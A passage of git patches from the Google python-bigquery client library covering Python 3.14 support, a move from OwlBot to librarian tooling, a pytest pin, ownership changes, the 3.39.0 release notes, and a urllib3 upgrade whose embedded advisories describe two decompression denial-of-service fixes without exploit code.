"3.13", "3.14"], default_python_version="3.9", ) diff --git a/pyproject.toml b/pyproject.toml index 1c6ec1f77..a0e356b34 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -38,6 +38,7 @@ classifiers = [ "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", + "Programming Language :: Python :: 3.14", "Operating System :: OS Independent", "Topic :: Internet", ] @@ -69,6 +70,7 @@ bqstorage = [ # https://github.com/grpc/grpc/pull/15254 "grpcio >= 1.47.0, < 2.0.0", "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", + "grpcio >= 1.75.1, < 2.0.0; python_version >= '3.14'", "pyarrow >= 4.0.0", ] pandas = [ @@ -76,6 +78,7 @@ pandas = [ "pandas-gbq >= 0.26.1", "grpcio >= 1.47.0, < 2.0.0", "grpcio >= 1.49.1, < 2.0.0; python_version >= '3.11'", + "grpcio >= 1.75.1, < 2.0.0; python_version >= '3.14'", "pyarrow >= 3.0.0", "db-dtypes >= 1.0.4, < 2.0.0", ] diff --git a/testing/constraints-3.14.txt b/testing/constraints-3.14.txt new file mode 100644 index 000000000..6bd20f5fb --- /dev/null +++ b/testing/constraints-3.14.txt @@ -0,0 +1,2 @@ +# Constraints for Python 3.14 +grpcio >= 1.75.1 From 68e915f5c6a6106a7d9ccd9f76c54cd7088a8870 Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 7 Nov 2025 13:29:40 -0500 Subject: [PATCH 185/202] chore(librarian): onboard to librarian (#2326) Towards https://github.com/googleapis/librarian/issues/2456 Files removed which is no longer used - Owlbot config files, including owlbot.py - Sync repo settings config file - Release please config files --- .github/.OwlBot.lock.yaml | 17 ----- .github/.OwlBot.yaml | 22 ------ .github/auto-approve.yml | 3 - .github/release-please.yml | 14 ---- .github/release-trigger.yml | 2 - .github/sync-repo-settings.yaml | 32 -------- .librarian/state.yaml | 10 +++ owlbot.py | 126 -------------------------------- 8 files changed, 10 insertions(+), 216 deletions(-) delete mode 100644 .github/.OwlBot.lock.yaml delete mode 100644 .github/.OwlBot.yaml delete mode 100644 .github/auto-approve.yml delete mode 100644 .github/release-please.yml delete mode 100644 .github/release-trigger.yml delete mode 100644 .github/sync-repo-settings.yaml create mode 100644 .librarian/state.yaml delete mode 100644 owlbot.py diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml deleted file mode 100644 index 4a311db02..000000000 --- a/.github/.OwlBot.lock.yaml +++ /dev/null @@ -1,17 +0,0 @@ -# Copyright 2025 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -docker: - image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9 -# created: 2025-10-09T14:48:42.914384887Z diff --git a/.github/.OwlBot.yaml b/.github/.OwlBot.yaml deleted file mode 100644 index 8b142686c..000000000 --- a/.github/.OwlBot.yaml +++ /dev/null @@ -1,22 +0,0 @@ -# Copyright 2021 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -docker: - image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - -deep-remove-regex: - - /owl-bot-staging - -begin-after-commit-hash: f2de93abafa306b2ebadf1d10d947db8bcf2bf15 - diff --git a/.github/auto-approve.yml b/.github/auto-approve.yml deleted file mode 100644 index 311ebbb85..000000000 --- a/.github/auto-approve.yml +++ /dev/null @@ -1,3 +0,0 @@ -# https://github.com/googleapis/repo-automation-bots/tree/main/packages/auto-approve -processes: - - "OwlBotTemplateChanges" diff --git a/.github/release-please.yml b/.github/release-please.yml deleted file mode 100644 index 5161ab347..000000000 --- a/.github/release-please.yml +++ /dev/null @@ -1,14 +0,0 @@ -releaseType: python -handleGHRelease: true -# NOTE: this section is generated by synthtool.languages.python -# See https://github.com/googleapis/synthtool/blob/master/synthtool/languages/python.py -branches: -- branch: v2 - handleGHRelease: true - releaseType: python -- branch: v1 - handleGHRelease: true - releaseType: python -- branch: v0 - handleGHRelease: true - releaseType: python diff --git a/.github/release-trigger.yml b/.github/release-trigger.yml deleted file mode 100644 index b975c190d..000000000 --- a/.github/release-trigger.yml +++ /dev/null @@ -1,2 +0,0 @@ -enabled: true -multiScmName: python-bigquery diff --git a/.github/sync-repo-settings.yaml b/.github/sync-repo-settings.yaml deleted file mode 100644 index ac91806eb..000000000 --- a/.github/sync-repo-settings.yaml +++ /dev/null @@ -1,32 +0,0 @@ -# https://github.com/googleapis/repo-automation-bots/tree/main/packages/sync-repo-settings -mergeCommitAllowed: false -# Rules for main branch protection -branchProtectionRules: -# Identifies the protection rule pattern. Name of the branch to be protected. -# Defaults to `main` -- pattern: main - requiresLinearHistory: true - requiresCodeOwnerReviews: true - requiresStrictStatusChecks: true - requiredStatusCheckContexts: - - 'Kokoro' - - 'Kokoro system-3.13' - - 'Kokoro snippets-3.13' - - 'cla/google' - - 'Samples - Lint' - - 'Samples - Python 3.9' - - 'Samples - Python 3.10' - - 'Samples - Python 3.11' - - 'Samples - Python 3.12' - - 'Samples - Python 3.13' - - 'Samples - Python 3.14' -- pattern: v2 - requiresLinearHistory: true - requiresCodeOwnerReviews: true - requiresStrictStatusChecks: true - requiredStatusCheckContexts: - - 'Kokoro' - - 'cla/google' - - 'Samples - Lint' - - 'Samples - Python 3.9' - - 'Samples - Python 3.10' diff --git a/.librarian/state.yaml b/.librarian/state.yaml new file mode 100644 index 000000000..1834779bc --- /dev/null +++ b/.librarian/state.yaml @@ -0,0 +1,10 @@ +image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:39628f6e89c9cad27973b9a39a50f7052bec0435ee58c7027b4fa6b655943e31 +libraries: + - id: google-cloud-bigquery + version: 3.38.0 + apis: [] + source_roots: + - . + preserve_regex: [] + remove_regex: [] + tag_format: v{version} diff --git a/owlbot.py b/owlbot.py deleted file mode 100644 index bd694180f..000000000 --- a/owlbot.py +++ /dev/null @@ -1,126 +0,0 @@ -# Copyright 2018 Google LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -"""This script is used to synthesize generated parts of this library.""" -from pathlib import Path - -import synthtool as s -from synthtool import gcp -from synthtool.languages import python - -REPO_ROOT = Path(__file__).parent.absolute() - -default_version = "v2" - -for library in s.get_staging_dirs(default_version): - # Avoid breaking change due to change in field renames. - # https://github.com/googleapis/python-bigquery/issues/319 - s.replace( - library / f"google/cloud/bigquery_{library.name}/types/standard_sql.py", - r"type_ ", - "type ", - ) - # Patch docs issue - s.replace( - library / f"google/cloud/bigquery_{library.name}/types/model.py", - r"""\"predicted_\"""", - """`predicted_`""", - ) - s.move(library / f"google/cloud/bigquery_{library.name}/types") -s.remove_staging_dirs() - -common = gcp.CommonTemplates() - -# ---------------------------------------------------------------------------- -# Add templated files -# ---------------------------------------------------------------------------- -templated_files = common.py_library( - cov_level=100, - samples=True, - microgenerator=True, - split_system_tests=True, - intersphinx_dependencies={ - "dateutil": "https://dateutil.readthedocs.io/en/latest/", - "geopandas": "https://geopandas.org/", - "pandas": "https://pandas.pydata.org/pandas-docs/stable/", - }, - system_test_python_versions=["3.9", "3.13"], - unit_test_python_versions=["3.9", "3.10", "3.11", "3.12", "3.13", "3.14"], - default_python_version="3.9", -) - -# BigQuery has a custom multiprocessing note -s.move( - templated_files, - excludes=[ - "noxfile.py", - "renovate.json", - "docs/multiprocessing.rst", - "docs/index.rst", - ".coveragerc", - ".github/CODEOWNERS", - # Include custom SNIPPETS_TESTS job for performance. - # https://github.com/googleapis/python-bigquery/issues/191 - ".kokoro/presubmit/presubmit.cfg", - ".kokoro/presubmit/system-3.8.cfg", - ".kokoro/continuous/prerelease-deps.cfg", - ".kokoro/samples/python3.7/**", - ".kokoro/samples/python3.8/**", - ".github/workflows/**", # exclude gh actions as credentials are needed for tests - "README.rst", - ], -) - -python.configure_previous_major_version_branches() - -s.replace( - ".kokoro/test-samples-impl.sh", - """# `virtualenv==20.26.6` is added for Python 3.7 compatibility -python3.9 -m pip install --upgrade --quiet nox virtualenv==20.26.6""", - "python3.9 -m pip install --upgrade --quiet nox virtualenv", -) - -s.replace( - "CONTRIBUTING.rst", - r"\$ nox -s py-3.8", - r"$ nox -s py-3.9", -) - -s.replace( - "scripts/readme-gen/templates/install_deps.tmpl.rst", - r"Samples are compatible with Python 3.7", - r"Samples are compatible with Python 3.9", -) - - -# ---------------------------------------------------------------------------- -# Samples templates -# ---------------------------------------------------------------------------- - -python.py_samples() - -s.replace( - "samples/**/noxfile.py", - 'BLACK_VERSION = "black==22.3.0"', - 'BLACK_VERSION = "black==23.7.0"', -) -s.replace( - "samples/**/noxfile.py", - r'ALL_VERSIONS = \["3.7", "3.8", "3.9", "3.10", "3.11", "3.12", "3.13"\]', - 'ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"]', -) - -s.shell.run(["nox", "-s", "blacken"], hide_output=False) -for noxfile in REPO_ROOT.glob("samples/**/noxfile.py"): - s.shell.run(["nox", "-s", "blacken"], cwd=noxfile.parent, hide_output=False) From 8016baa2b1797324c10208c30be991bd00f92a0b Mon Sep 17 00:00:00 2001 From: Anthonios Partheniou Date: Fri, 21 Nov 2025 11:19:22 -0500 Subject: [PATCH 186/202] tests: temporarily pin pytest (#2334) Temporarily pin `pytest < 9` to resolve the following issue ``` for invalid_view_value in invalid_view_values: > with self.subTest(invalid_view_value=invalid_view_value): tests/unit/test_client.py:810: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ /opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__ next(self.gen) /opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__ next(self.gen) .nox/unit-3-11/lib/python3.11/site-packages/_pytest/unittest.py:438: in addSubTest self.ihook.pytest_runtest_logreport(report=sub_report) .nox/unit-3-11/lib/python3.11/site-packages/pluggy/_hooks.py:512: in __call__ return self._hookexec(self.name, self._hookimpls.copy(), kwargs, firstresult) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/pluggy/_manager.py:120: in _hookexec return self._inner_hookexec(hook_name, methods, kwargs, firstresult) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:289: in pytest_runtest_logreport self.sendevent("testreport", data=data) .nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:126: in sendevent self.channel.send((name, kwargs)) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:912: in send self.gateway._send(Message.CHANNEL_DATA, self.id, dumps_internal(item)) ^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1629: in dumps_internal return _Serializer().save(obj) # type: ignore[return-value] ^^^^^^^^^^^^^^^^^^^^^^^ .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1647: in save self._save(obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1744: in save_tuple self._save(item) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save dispatch(self, obj) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict self._write_setitem(key, value) .nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem self._save(value) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ self = obj = def _save(self, obj: object) -> None: tp = type(obj) try: dispatch = self._dispatch[tp] except KeyError: methodname = "save_" + tp.__name__ meth: Callable[[_Serializer, object], None] | None = getattr( self.__class__, methodname, None ) if meth is None: > raise DumpError(f"can't serialize {tp}") from None E execnet.gateway_base.DumpError: can't serialize ``` The upstream issue is tracked in https://github.com/pytest-dev/pytest-xdist/issues/1273 --- noxfile.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/noxfile.py b/noxfile.py index 2457382fb..194e7ce8f 100644 --- a/noxfile.py +++ b/noxfile.py @@ -95,7 +95,8 @@ def default(session, install_extras=True): # Install all test dependencies, then install local packages in-place. session.install( - "pytest", + # TODO(https://github.com/pytest-dev/pytest-xdist/issues/1273): Remove once this bug is fixed + "pytest<9", "google-cloud-testutils", "pytest-cov", "pytest-xdist", From 0529726400b1df4ade75cc3c9a829632ccb72eb8 Mon Sep 17 00:00:00 2001 From: ohmayr Date: Fri, 21 Nov 2025 08:42:31 -0800 Subject: [PATCH 187/202] chore: update librarian sha (#2329) This PR updates the librarian sha to support v1.0.0 --- .librarian/state.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index 1834779bc..b5d3126e4 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,4 +1,4 @@ -image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:39628f6e89c9cad27973b9a39a50f7052bec0435ee58c7027b4fa6b655943e31 +image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery version: 3.38.0 From 91fed546bf0cf7f3feaa44453cc7dc2394fdbd92 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 26 Nov 2025 10:56:58 -0500 Subject: [PATCH 188/202] chore(python): removes a filter put in place due to a dependency issue with pyarrow (#2338) Due to an issue with `pyarrow`, a significant dependency for certain python-bigquery use cases, not being compatible with Python 3.14, we temporarily skipped the failing CI/CD check for 3.14 while awaiting the update to pyarrow. Pyarrow is now fully compatible, so that filter is being removed. **KNOWN ISSUES**: this will show that unittests for 3.14 are failing. This has nothing to do with this PR/these changes. It is being addressed in an alternate mod. It is due to a missing dependency related to handling IO for `geopandas` (namely it is missing `libgdal-dev`, etc which are normally installed with `pyogrio` + `geopandas`). Because `pyogrio` is currently not compatible with Python 3.14 the tests in 3.14 cannot complete. This should not prevent **this PR from being merged** to help solve the current issue, which is a blocker for getting our continuous tests to green. --- .github/workflows/unittest.yml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.github/workflows/unittest.yml b/.github/workflows/unittest.yml index f6b92547e..550724076 100644 --- a/.github/workflows/unittest.yml +++ b/.github/workflows/unittest.yml @@ -21,12 +21,6 @@ jobs: python -m pip install --upgrade setuptools pip wheel python -m pip install nox - name: Run unit tests - - # TODO (https://b.corp.google.com/issues/450370502) 3.14 is not yet supported by pyarrow. See - # https://github.com/googleapis/google-cloud-python/issues/14686 - # https://github.com/apache/arrow/issues/47438 - # Reinstate running tests with 3.14 once this bug is fixed - if: matrix.python != '3.14' env: COVERAGE_FILE: .coverage-${{ matrix.python }} run: | From fcaf397def1a8c7a05bae9f30f268dc696c4bba3 Mon Sep 17 00:00:00 2001 From: shollyman Date: Mon, 15 Dec 2025 13:10:04 -0800 Subject: [PATCH 189/202] chore: update ownership/routing for repo (#2346) This PR effectively moves ownership for this repo to the python language team, and removes api-bigquery as the defacto code owner. --- .github/CODEOWNERS | 6 +++--- .github/blunderbuss.yml | 6 +++--- .repo-metadata.json | 2 +- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 6763f258c..c7478150e 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -4,8 +4,8 @@ # For syntax help see: # https://help.github.com/en/github/creating-cloning-and-archiving-repositories/about-code-owners#codeowners-syntax -# The @googleapis/api-bigquery is the default owner for changes in this repo -* @googleapis/api-bigquery @googleapis/yoshi-python +# The @googleapis/python-core-client-libraries is the default owner for changes in this repo +* @googleapis/python-core-client-libraries @googleapis/yoshi-python # The python-samples-reviewers team is the default owner for samples changes -/samples/ @googleapis/api-bigquery @googleapis/python-samples-owners @googleapis/yoshi-python +/samples/ @googleapis/python-core-client-libraries @googleapis/python-samples-owners @googleapis/yoshi-python diff --git a/.github/blunderbuss.yml b/.github/blunderbuss.yml index 5b7383dc7..ff168399d 100644 --- a/.github/blunderbuss.yml +++ b/.github/blunderbuss.yml @@ -4,14 +4,14 @@ # Note: This file is autogenerated. To make changes to the assignee # team, please update `codeowner_team` in `.repo-metadata.json`. assign_issues: - - googleapis/api-bigquery + - googleapis/python-core-client-libraries assign_issues_by: - labels: - "samples" to: - googleapis/python-samples-reviewers - - googleapis/api-bigquery + - googleapis/python-core-client-libraries assign_prs: - - googleapis/api-bigquery + - googleapis/python-core-client-libraries diff --git a/.repo-metadata.json b/.repo-metadata.json index d1be7ec4d..82a1684ca 100644 --- a/.repo-metadata.json +++ b/.repo-metadata.json @@ -12,7 +12,7 @@ "api_id": "bigquery.googleapis.com", "requires_billing": false, "default_version": "v2", - "codeowner_team": "@googleapis/api-bigquery", + "codeowner_team": "@googleapis/python-core-client-libraries", "api_shortname": "bigquery", "api_description": "is a fully managed, NoOps, low cost data analytics service.\nData can be streamed into BigQuery at millions of rows per second to enable real-time analysis.\nWith BigQuery you can easily deploy Petabyte-scale Databases." } From 8634630fca32ae38ce6b4ef27679bb7444be59c6 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 15 Dec 2025 18:20:36 -0500 Subject: [PATCH 190/202] chore: librarian release pull request: 20251212T151524Z (#2344) PR created by the Librarian CLI to initialize a release. Merging this PR will auto trigger a release. Librarian Version: v0.7.0 Language Image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
google-cloud-bigquery: 3.39.0 ## [3.39.0](https://github.com/googleapis/python-bigquery/compare/v3.38.0...v3.39.0) (2025-12-12) ### Features * adds support for Python runtime 3.14 (#2322) ([6065e14c](https://github.com/googleapis/python-bigquery/commit/6065e14c)) * Add ExternalRuntimeOptions to BigQuery routine (#2311) ([fa76e310](https://github.com/googleapis/python-bigquery/commit/fa76e310)) ### Bug Fixes * remove ambiguous error codes from query retries (#2308) ([8bbd3d01](https://github.com/googleapis/python-bigquery/commit/8bbd3d01)) * include `io.Base` in the `PathType` (#2323) ([b11e09cb](https://github.com/googleapis/python-bigquery/commit/b11e09cb)) * honor custom `retry` in `job.result()` (#2302) ([e118b029](https://github.com/googleapis/python-bigquery/commit/e118b029)) ### Documentation * remove experimental annotations from GA features (#2303) ([1f1f9d41](https://github.com/googleapis/python-bigquery/commit/1f1f9d41))
Co-authored-by: Daniel Sanche --- .librarian/state.yaml | 3 ++- CHANGELOG.md | 20 ++++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 3 files changed, 23 insertions(+), 2 deletions(-) diff --git a/.librarian/state.yaml b/.librarian/state.yaml index b5d3126e4..8d67105e3 100644 --- a/.librarian/state.yaml +++ b/.librarian/state.yaml @@ -1,7 +1,8 @@ image: us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620 libraries: - id: google-cloud-bigquery - version: 3.38.0 + version: 3.39.0 + last_generated_commit: "" apis: [] source_roots: - . diff --git a/CHANGELOG.md b/CHANGELOG.md index 95db5735c..4cf177cc5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,6 +4,26 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.39.0](https://github.com/googleapis/google-cloud-python/compare/google-cloud-bigquery-v3.38.0...google-cloud-bigquery-v3.39.0) (2025-12-12) + + +### Documentation + +* remove experimental annotations from GA features (#2303) ([1f1f9d41e8a2c9016198d848ad3f1cbb88cf77b0](https://github.com/googleapis/google-cloud-python/commit/1f1f9d41e8a2c9016198d848ad3f1cbb88cf77b0)) + + +### Features + +* adds support for Python runtime 3.14 (#2322) ([6065e14c448cb430189982dd70025fa0575777ca](https://github.com/googleapis/google-cloud-python/commit/6065e14c448cb430189982dd70025fa0575777ca)) +* Add ExternalRuntimeOptions to BigQuery routine (#2311) ([fa76e310a16ea6cba0071ff1d767ca1c71514da7](https://github.com/googleapis/google-cloud-python/commit/fa76e310a16ea6cba0071ff1d767ca1c71514da7)) + + +### Bug Fixes + +* include `io.Base` in the `PathType` (#2323) ([b11e09cb6ee32e451b37eda66bece2220b9ceaba](https://github.com/googleapis/google-cloud-python/commit/b11e09cb6ee32e451b37eda66bece2220b9ceaba)) +* honor custom `retry` in `job.result()` (#2302) ([e118b029bbc89a5adbab83f39858c356c23665bf](https://github.com/googleapis/google-cloud-python/commit/e118b029bbc89a5adbab83f39858c356c23665bf)) +* remove ambiguous error codes from query retries (#2308) ([8bbd3d01026c493dfa5903b397d2b01c0e9bf43b](https://github.com/googleapis/google-cloud-python/commit/8bbd3d01026c493dfa5903b397d2b01c0e9bf43b)) + ## [3.38.0](https://github.com/googleapis/python-bigquery/compare/v3.37.0...v3.38.0) (2025-09-15) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index 22550a8f1..1d5e35889 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. -__version__ = "3.38.0" +__version__ = "3.39.0" From bfd9d8da91d0cb1a1e5d87007fa8a5462486dca9 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 17 Dec 2025 01:02:06 +0000 Subject: [PATCH 191/202] chore(deps): update dependency urllib3 to v2.6.0 [security] (#2342) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.5.0` -> `==2.6.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.5.0/2.6.0?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53) ## Impact urllib3 supports chained HTTP encoding algorithms for response content according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`). However, the number of links in the decompression chain was unbounded allowing a malicious server to insert a virtually unlimited number of compression steps leading to high CPU usage and massive memory allocation for the decompressed data. ## Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier for HTTP requests to untrusted sources unless they disable content decoding explicitly. ## Remediation Upgrade to at least urllib3 v2.6.0 in which the library limits the number of links to 5. If upgrading is not immediately possible, use [`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) and ensure that `resp.headers["content-encoding"]` contains a safe number of encodings before reading the response content. #### [CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data; CWE-409) on the client side, even if the application only requested a small chunk of data. ### Affected usages Applications and libraries using urllib3 version 2.5.0 and earlier to stream large compressed responses or content from untrusted sources. `stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`, `readinto(b)` are examples of `urllib3.HTTPResponse` method calls using the affected logic unless decoding is disabled explicitly. ### Remediation Upgrade to at least urllib3 v2.6.0 in which the library avoids decompressing data that exceeds the requested amount. If your environment contains a package facilitating the Brotli encoding, upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These versions are enforced by the `urllib3[brotli]` extra in the patched versions of urllib3. ### Credits The issue was reported by @​Cycloctane. Supplemental information was provided by @​stamparm during a security audit performed by [7ASecurity](https://7asecurity.com/) and facilitated by [OSTIF](https://ostif.org/). --- ### Release Notes
urllib3/urllib3 (urllib3) ### [`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0) \================== ## Security - Fixed a security issue where streaming API could improperly handle highly compressed HTTP content ("decompression bombs") leading to excessive resource consumption even when a small amount of data was requested. Reading small chunks of compressed data is safer and much more efficient now. (`GHSA-2xpw-w6gg-jr37 `\_\_) - Fixed a security issue where an attacker could compose an HTTP response with virtually unlimited links in the `Content-Encoding` header, potentially leading to a denial of service (DoS) attack by exhausting system resources during decoding. The number of allowed chained encodings is now limited to 5. (`GHSA-gm62-xv2j-4w53 `\_\_) .. caution:: - If urllib3 is not installed with the optional `urllib3[brotli]` extra, but your environment contains a Brotli/brotlicffi/brotlipy package anyway, make sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to benefit from the security fixes and avoid warnings. Prefer using `urllib3[brotli]` to install a compatible Brotli package automatically. - If you use custom decompressors, please make sure to update them to respect the changed API of `urllib3.response.ContentDecoder`. ## Features - Enabled retrieval, deletion, and membership testing in `HTTPHeaderDict` using bytes keys. (`#​3653 `\_\_) - Added host and port information to string representations of `HTTPConnection`. (`#​3666 `\_\_) - Added support for Python 3.14 free-threading builds explicitly. (`#​3696 `\_\_) ## Removals - Removed the `HTTPResponse.getheaders()` method in favor of `HTTPResponse.headers`. Removed the `HTTPResponse.getheader(name, default)` method in favor of `HTTPResponse.headers.get(name, default)`. (`#​3622 `\_\_) ## Bugfixes - Fixed redirect handling in `urllib3.PoolManager` when an integer is passed for the retries parameter. (`#​3649 `\_\_) - Fixed `HTTPConnectionPool` when used in Emscripten with no explicit port. (`#​3664 `\_\_) - Fixed handling of `SSLKEYLOGFILE` with expandable variables. (`#​3700 `\_\_) ## Misc - Changed the `zstd` extra to install `backports.zstd` instead of `zstandard` on Python 3.13 and before. (`#​3693 `\_\_) - Improved the performance of content decoding by optimizing `BytesQueueBuffer` class. (`#​3710 `\_\_) - Allowed building the urllib3 package with newer setuptools-scm v9.x. (`#​3652 `\_\_) - Ensured successful urllib3 builds by setting Hatchling requirement to >= 1.27.0. (`#​3638 `\_\_)
